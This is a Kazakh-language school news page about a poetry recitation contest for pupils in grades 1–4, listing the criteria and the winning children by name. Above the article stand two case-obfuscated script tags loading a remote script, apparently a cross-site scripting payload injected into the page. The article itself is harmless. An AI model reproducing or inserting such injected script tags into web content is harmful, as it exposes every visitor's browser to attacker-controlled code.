<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.03.2017

Ғ.Әбдірахманұлы атындағы Қима орта мектебінде 13.03.2017 күні мектебімізге 40 жыл толуына орай «Мектеп» атты тақырып бойынша бастауыш сыныптар арасында мәнерлеп оқу сайысы өткізілді.     Қатаң қазылар алдында өлең оқу барысында ең жақсы тақырып –мектеп туралы өлеңдер. Мәнерлеп өлең оқу қатысушының жеке қабілеттерін көрсетеді, ал мектеп туралы өлеңдер оқушылардың білімге деген сүйіспеншіліктерін оятады. Сайыстың мақсаты мәнерлеп оқу шеберліктерінің дамуы, оқу мәнерін меңгеру, сөйлеу мәдениетін қалыптасуын байқау, бағалау.

Сайысқа 1-4 сынып оқушылары мәнерлеп оқу критерийлерін ұстана отырып, кезекпен шығып, әр оқушы дайындаған өлеңдерін оқыды.

1.Өлеңді тақырыпқа сай таңдау;

2.Өлеңді жатқа айту;

3.Өлеңді мәнерлеп, нақышына келтіріп оқу.

Жеңістер мен жеңілістен тұратын,

Өмір – күрес, жеткізе ме мұратын?

Жеңбедім, жеңілдім деп ренжімеген,

Қатысу да бір жеңіс, жан болсаң сен ұғатын – дей келе әділқазылар сайыстың шешімін шығарып, 1-2 сыныптар арасында

І орынға 1 «Ә» сынып оқушысы Камашева Наргиз

ІІ орынға 2 «А» сынып оқушысы Султанбек Мансур

3-4 сыныптар арасында

І орынға 4 «А» сынып оқушысы Смакова Адиля

ІІ орынға 4 «А» сынып оқушысы Әмірхаш Қалмұрат

ІІІ орынға 4 «А» сынып оқушысы Амангелді Тамирлан ие болып мақтау қағазымен марапатталды.

Просмотров: 758


Пікір қосу



Деректерді қолтаңбаға қосу